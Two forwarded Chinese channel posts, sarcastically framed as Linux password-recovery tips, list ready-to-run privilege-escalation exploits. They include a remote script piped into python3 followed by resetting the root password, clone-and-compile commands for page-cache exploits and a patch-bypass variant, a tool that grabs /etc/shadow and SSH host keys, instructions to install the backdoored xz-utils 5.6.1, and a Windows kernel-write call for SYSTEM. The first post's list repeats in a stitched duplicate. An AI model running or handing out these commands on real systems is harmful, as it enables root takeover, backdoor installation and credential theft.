Forwarded from kMBRjund/0 🧊 (rpool/MBR)
1. Linux 找回密码教程,建议收藏!
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
Forwarded from 🐱MiaoTony's Box | 困困困 zzz (MiaoTony 🐱)
#今天又看了啥 #security #CVE #tutorial(雾
1. Linux 密码忘了不用慌,先把身份切回来再说。
3. 如果希望后门由系统组件长期代管,也有现成方案。
4. 如果环境里正好有高性能网卡,内核队列也可以帮忙处理权限问题。
5. 如果没有高端网卡,也可以直接走 page cache 提权路线。
6. 如果原版修过了,也还有一个新的绕过版本。
7. 如果只想拿密码材料,不一定非要直接提 shell。
9. 如果机房策略限制了 SSH,只给 Web 服务开口子,也不代表运维入口真的消失了。
10. 如果用的是 Windows,普通进程也有办法把自己抬到 SYSTEM。
1. Linux 密码忘了不用慌,先把身份切回来再说。
2. 如果不想走交互式流程,也可以直接改只读文件。curl https://copy.fail/exp | python3
su
passwd root
Copyfail 这一类漏洞的重点不是“恢复密码”,而是先把 root 执行能力拿到手,再让系统接受你设置的新密码。
git clone https://github.com/V4bel/dirtyfrag.git && \
cd dirtyfrag && \
gcc -O0 -Wall -o exp exp.c -lutil && \
./exp
Dirty Frag / Dirty Pipe 这一类思路,本质上都是利用内核 page cache 路径,把原本不该被普通用户改写的只读文件内容改掉。密码记不住没关系,先把提权入口写进去更直接。
3. 如果希望后门由系统组件长期代管,也有现成方案。
项目地址:https://github.com/tukaani-project/xz/tree/v5.6.1sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
这类供应链后门的特点是不急着“马上提权”,而是先把能力埋进日常依赖里。之后每次正常使用 SSH,都等于替后门完成了一次授权和调度。
4. 如果环境里正好有高性能网卡,内核队列也可以帮忙处理权限问题。
原文:https://ze3tar.github.io/post-zcrx.html插入一个支持 ZCRX 的网卡,
将其置为 down,
重复触发 ptr_ring drain 与 scrub loop,
让 free_count 写溢出。
这类漏洞利用的是驱动与资源回收逻辑。表面上是在回收和清理队列,实际上是在把计数和对象状态推到异常分支,最后把内核边界条件转换成提权入口。
5. 如果没有高端网卡,也可以直接走 page cache 提权路线。
git clone https://github.com/v12-security/pocs.git && \
cd pocs/fragnesia && \
gcc -o exp fragnesia.c && \
./exp
Fragnesia 的核心是利用 Linux XFRM ESP-in-TCP 逻辑缺陷,对只读文件的 page cache 做逐字节写入,再把/usr/bin/su改成提权 stub。磁盘文件没变,但内存中执行的那份已经足够把普通用户抬成 root。
6. 如果原版修过了,也还有一个新的绕过版本。
git clone https://github.com/v12-security/pocs.git && \
cd pocs/fragnesia-5db89c99566fc && \
make && \
sudo modprobe esp4 && \
./skb_segment_exploit
这个变种不再走原始修复点,而是利用skb_segment()在处理frag_list时错误传播SKBFL_SHARED_FRAG标志,最终继续落到原地解密 page cache 的路径上。补丁打过,但可写面还在。
7. 如果只想拿密码材料,不一定非要直接提 shell。
8. 如果目标不是密码,而是 SSH 主机私钥,也可以按同样方式处理。git clone https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn && \
cd ssh-keysign-pwn && \
make && \
./chage_pwn root
这里利用的是 Linux 进程退出窗口:内存先释放,文件后关闭。攻击者就在这个短暂时机里,把chage以 root 打开的/etc/shadow文件描述符接管下来,再慢慢离线处理 root 哈希。
git clone https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn && \
cd ssh-keysign-pwn && \
make && \
./sshkeysign_pwnssh-keysign会先以 root 身份打开/etc/ssh/ssh_host_*_key,退出过程中再释放资源。攻击者利用同一个 fd 窃取窗口,把还没来得及关闭的 host key 文件句柄直接拿走。
9. 如果机房策略限制了 SSH,只给 Web 服务开口子,也不代表运维入口真的消失了。
原文:https://depthfirst.com/nginx-rift
nginx-rift 这类问题的意义在于:入口看起来只是普通 Web 服务,落点却能扩展成整台主机的控制权。对于“只能开网页、不能开 SSH”的环境,这类链路反而更适合接管系统。
10. 如果用的是 Windows,普通进程也有办法把自己抬到 SYSTEM。
NtQuerySystemInformation(
(SYSTEM_INFORMATION_CLASS)253,
(PVOID)KernelAddress,
0,
NULL
);
当NtQuerySystemInformation使用SystemProcessInformationExtension(253)并把输出长度设为 0 时,ProbeForWrite校验被绕过,后续内核代码会对攻击者指定的内核地址做递增写。结果是:即使起点只是低权限进程,最终也能稳定走到 SYSTEM,连 Chrome 沙箱里都可以触发。